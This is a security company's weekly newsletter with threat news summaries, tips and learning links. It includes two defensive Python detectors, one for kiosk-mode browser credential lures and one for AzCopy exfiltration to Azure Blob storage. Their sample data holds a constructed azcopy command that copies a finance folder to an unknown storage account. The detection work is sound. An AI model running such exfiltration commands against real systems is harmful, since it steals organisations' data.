Triage The Week 042 – Kraven Security

Welcome back to Kraven Security’s weekly newsletter, where we triage the week. We’ll recap the week’s biggest news stories, highlight our lead story, give you some educational resources, and wrap up with a few personal notes on what’s happening at the company. Enjoy!


Top 5 News Stories


Malware blocks web browser in kiosk mode to steal login credentials

A new malware campaign locks the user’s browser in kiosk mode in order to steal Google login credentials.

Top 4 key conclusions:
🪲 The malware starts the browser in kiosk mode, making it full screen and preventing navigation away from the login page. The user is then forced to enter their credentials to “unlock” the browser.
🪪 Once the credentials are saved, the StealC malware steals them from the browser’s credentials store.
⚡️ The technique is implemented using an AutoIt script, which identifies available browsers and launches them in kiosk mode, targeting specific services such as Google.
🛡️ Users should avoid entering sensitive information and use keyboard shortcuts or Task Manager to close the browser. Perform a hard reset if necessary and run a full antivirus scan.
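Kiosk mode by itself is legitimate (digital signage, shared terminals), so the defensive signal in this story is the combination: a browser started with the kiosk switch by a scripting host and pointed at a login page. The following added example (not from OALABS or the original article) triages constructed process-creation records for that combination; field names, the list of script hosts and the sample data are assumptions.

```python
# Added example: flag browser launches that match the kiosk-mode credential lure.
# Sample records are constructed, not real telemetry; field names are assumptions.
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
SCRIPT_HOSTS = {"autoit3.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
LOGIN_HOSTS = ("accounts.google.com", "login.microsoftonline.com")

EVENTS = [
    {"host": "ws-042", "parent": r"C:\Users\jdoe\AppData\Roaming\AutoIt3.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": '"chrome.exe" --kiosk https://accounts.google.com/ServiceLogin'},
    {"host": "lobby-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": '"chrome.exe" --kiosk https://signage.example.com/'},
    {"host": "ws-013", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": '"msedge.exe" https://accounts.google.com/'},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def kiosk_findings(events):
    """Return (host, reasons) for browser launches that match the kiosk lure pattern."""
    findings = []
    for ev in events:
        if basename(ev["image"]) not in BROWSERS:
            continue
        args = ev["cmdline"].lower().split()
        reasons = []
        if "--kiosk" in args:                      # real Chromium switch
            reasons.append("kiosk mode")
        if basename(ev["parent"]) in SCRIPT_HOSTS:
            reasons.append(f"spawned by {basename(ev['parent'])}")
        if any(h in ev["cmdline"].lower() for h in LOGIN_HOSTS):
            reasons.append("login page as start URL")
        # Kiosk mode alone is common and legitimate; alert only when it is paired
        # with a scripting-host parent or a login page as the start URL.
        if "kiosk mode" in reasons and len(reasons) >= 2:
            findings.append((ev["host"], reasons))
    return findings


if __name__ == "__main__":
    for host, why in kiosk_findings(EVENTS):
        print(host, "->", ", ".join(why))
```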

OALABS research

North Korean hackers use LinkedIn and coding challenges to spread malware

North Korean cybercriminals are targeting cryptocurrency users on LinkedIn with malware called RustDoor.

Top 4 key conclusions:
💬 The FBI has issued a public service announcement warning the crypto industry of targeted attacks by North Korea using social engineering techniques.
🥸 Attackers use professional networking platforms to pose as recruiters and spread malware through coding challenges.
🪲 The malware is distributed via booby-trapped Visual Studio projects and contains backdoor functionality.
🛡️ It is crucial to train employees to be careful with unsolicited contacts on social media and to avoid using unknown software.

jam

Azure Storage Explorer now being abused by ransomware gangs

Ransomware gangs like BianLian and Rhysida use Azure Storage Explorer and Microsoft’s AzCopy to steal data from infected networks and store it in Azure Blob storage.

Top 4 key conclusions:
🎯 Azure’s trusted state, scalability, and performance make it an attractive option for attackers to quickly and quietly exfiltrate large amounts of data.
⚙️ Azure Storage Explorer is typically used for managing Azure storage, but has also been used by malicious actors for large-scale data transfers to cloud storage.
🪵 Using log files created by Storage Explorer and AzCopy, investigators can determine what data was stolen and identify other possible payloads.
🛡️ Recommended defensive measures include monitoring AzCopy execution, egress traffic to Azure Blob Storage endpoints, and setting alarms for unusual file copy or access patterns.
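The recommended measures above boil down to two detections: AzCopy runs whose destination is a storage account the organisation does not own, and sustained egress to Blob endpoints from hosts that have no business doing backups. This added example (not modePUSH’s code) implements both over constructed process and network records; the field names, the allow-list of known accounts and the egress threshold are assumptions to tune to your environment.

```python
# Added example: detect AzCopy use and Blob Storage egress to unknown accounts.
# Sample telemetry is constructed, not real logs; field names are assumptions.
from urllib.parse import urlparse

BLOB_SUFFIX = ".blob.core.windows.net"
EGRESS_THRESHOLD = 500 * 1024 ** 2      # 500 MiB per host; tune to your baseline (assumption)
KNOWN_ACCOUNTS = {"corpbackup"}         # storage accounts the org owns (assumption)

PROCESS_EVENTS = [
    {"host": "ws-042", "user": "jdoe", "image": r"C:\Users\jdoe\Downloads\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\Finance" "https://stor1.blob.core.windows.net/c1?sv=2022" --recursive'},
    {"host": "srv-bk1", "user": "svc_backup", "image": r"C:\Program Files\Backup\azcopy.exe",
     "cmdline": r'azcopy.exe sync "D:\Backups" "https://corpbackup.blob.core.windows.net/bk"'},
]
NETWORK_EVENTS = [
    {"host": "ws-042", "dst": "stor1.blob.core.windows.net", "bytes_out": 900 * 1024 ** 2},
    {"host": "srv-bk1", "dst": "corpbackup.blob.core.windows.net", "bytes_out": 2 * 1024 ** 3},
    {"host": "ws-013", "dst": "cdn.example.com", "bytes_out": 50 * 1024 ** 2},
]


def blob_account(hostname):
    """Storage-account name if hostname is an Azure Blob endpoint, else None."""
    h = (hostname or "").lower()
    return h[: -len(BLOB_SUFFIX)] if h.endswith(BLOB_SUFFIX) else None


def azcopy_findings(events):
    """Flag AzCopy runs whose destination account is not on the allow-list."""
    out = []
    for ev in events:
        if ev["image"].rsplit("\\", 1)[-1].lower() != "azcopy.exe":
            continue
        for tok in ev["cmdline"].split():          # destination URLs appear as arguments
            acct = blob_account(urlparse(tok.strip('"')).hostname)
            if acct and acct not in KNOWN_ACCOUNTS:
                out.append((ev["host"], ev["user"], f"azcopy to unknown account {acct}"))
    return out


def egress_findings(events):
    """Flag hosts sending more than EGRESS_THRESHOLD bytes to unknown Blob accounts."""
    totals = {}
    for ev in events:
        acct = blob_account(ev["dst"])
        if acct and acct not in KNOWN_ACCOUNTS:
            totals[(ev["host"], acct)] = totals.get((ev["host"], acct), 0) + ev["bytes_out"]
    return [(h, a, f"{b // 1024 ** 2} MiB egress to blob account {a}")
            for (h, a), b in totals.items() if b > EGRESS_THRESHOLD]


if __name__ == "__main__":
    for finding in azcopy_findings(PROCESS_EVENTS) + egress_findings(NETWORK_EVENTS):
        print(finding)
```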

modePUSH

At least nine people were killed after pagers used by Hezbollah members exploded across the country. More than 2,750 people were injured, more than 200 seriously.

Top 4 key conclusions:
💬 Hezbollah accuses Israel of causing the explosions. According to Hezbollah, the pagers were intercepted and equipped with detonators.
🚑 The Lebanese Red Cross has deployed 130 ambulances and more than 500 first aid workers to manage the aftermath and has issued an urgent appeal for blood donors.
📅 The incident has been compared to a 1996 event in which Israeli intelligence services assassinated Hamas’s top bomb maker by detonating explosives in his mobile phone.
🕵️ Post-Snowden leaks have shown how easy it is for governments to intercept technology purchases and tamper with them. But to do it on such a large scale suggests an unprecedented intelligence coup.

Al Jazeera

Europol dismantles encrypted communications platform ‘Ghost’

Europol and law enforcement agencies from nine countries have successfully dismantled the encrypted communications platform ‘Ghost’, which was used by organised crime for activities such as drug trafficking and money laundering.

Top 4 key conclusions:
🔐 Ghost offered advanced security features, including three layers of encryption and a message self-destruct system. A subscription cost $2,350 for six months.
👻 Ghost was reportedly used for drug trafficking, money laundering, and ordering murders.
👮 The investigation, which began in March 2022, led to the discovery of Ghost’s servers and assets, resulting in 51 arrests across multiple countries.
😬 The dismantling of Ghost and similar platforms has fragmented the encrypted communications landscape, making it harder for law enforcement to track criminal activity.

Europol


Top tips of the week


Threat Information

  • Conduct threat intelligence awareness sessions. Ensure all team members understand the value and application of threat intel.

Threat Hunt

  • Foster a proactive mindset when hunting threats. Be the hunter, not the hunted. Anticipate and neutralize potential threats.
  • Embrace a proactive mindset when hunting cyber threats. Anticipate and neutralize potential threats before they escalate.
  • Use threat intelligence for risk assessment when hunting cyber threats. Identify and prioritize potential risks to allocate resources effectively.

Custom tools

  • Collaborate with threat modeling teams during custom tool development. Identify potential risks and vulnerabilities to strengthen security measures.
  • Implement secure coding practices in custom tool development. Address code-level vulnerabilities to improve overall security.
  • Communicate regular updates about customized tools to your team. Keep stakeholders informed about improvements and changes.

Main article

The Lifecycle of Cyber Threat Intelligence

Analyzing cyber threat intelligence can be daunting. You’re often overwhelmed with data, drowning in overlapping connections, and don’t know where to start or when to finish your analysis. To help their analysts navigate the maze, intelligence organizations around the world use the intelligence lifecycle.

The intelligence lifecycle is a structured approach to collecting, analyzing, and distributing intelligence. It serves as a template that analysts can follow to produce or consume intelligence. The cybersecurity industry has adapted this lifecycle to its needs by creating the cyber threat intelligence (CTI) lifecycle.

This article is your essential guide to the CTI lifecycle. You’ll learn about the six phases, how this model is used in the real world, and how to get the most out of it. Let’s get started!

Read now


Teaching materials


Edit your videos faster!

Creating content and teaching others is a great way to solidify your understanding of a topic. If you want to do this by creating videos, check this out!

In this presentation, MrAlexTech explores efficient editing in DaVinci Resolve. He covers various tips, tricks, and workflows to speed up the editing process, making it more accessible and manageable for everyone.

Learn how to scrape Telegram with Python

Scripting skills are essential if you want a long and fulfilling career in cybersecurity.

This video (by the legendary John Hammond) shows how to scrape Telegram channels and messages using Python, specifically the Telethon library. It covers installation, setup, and basic usage, including sending messages and joining channels.

Use this video as a stepping stone to creating your own web scrapers in Python!

How do you manage your time?

Time management is a skill we all need to master to combat the busyness of 21st century life. This is especially true if you are an entrepreneur, have a side hustle or are looking to make a career change.

This video discusses how to manage your time effectively as an entrepreneur, focusing on strategies from Dan Martell’s book “Buy Back Your Time”. These include overcoming the pain barrier in growing a business, the buyback loop, the drip matrix, and the three transactions that matter.

I highly recommend you watch this video and then buy the book!

Become an Active Directory master today!

To successfully attack or defend large organizations, you need to understand Active Directory.

This video is a beginner’s guide to Active Directory. Dale Hobbs does a great job of covering the basics, such as objects, architecture, trusts, group policy, certificates, and more.

He also discusses common issues and challenges that IT teams face when setting up and using Active Directory at scale, and provides best practices for securing it.


Personal notes


🤔 Back to making videos!

This week at Kraven we’ve been busy turning our written content into videos. We’ve been writing scripts, filming, and editing new videos for our MISP series!

Creating videos requires a completely different skill set than creating written content. This has made adding videos to our repertoire of free learning resources both fun and challenging. It’s been a steep learning curve, but we’re improving our process and quality with each new video.

I look forward to sharing what we’ve created with you in the coming weeks.
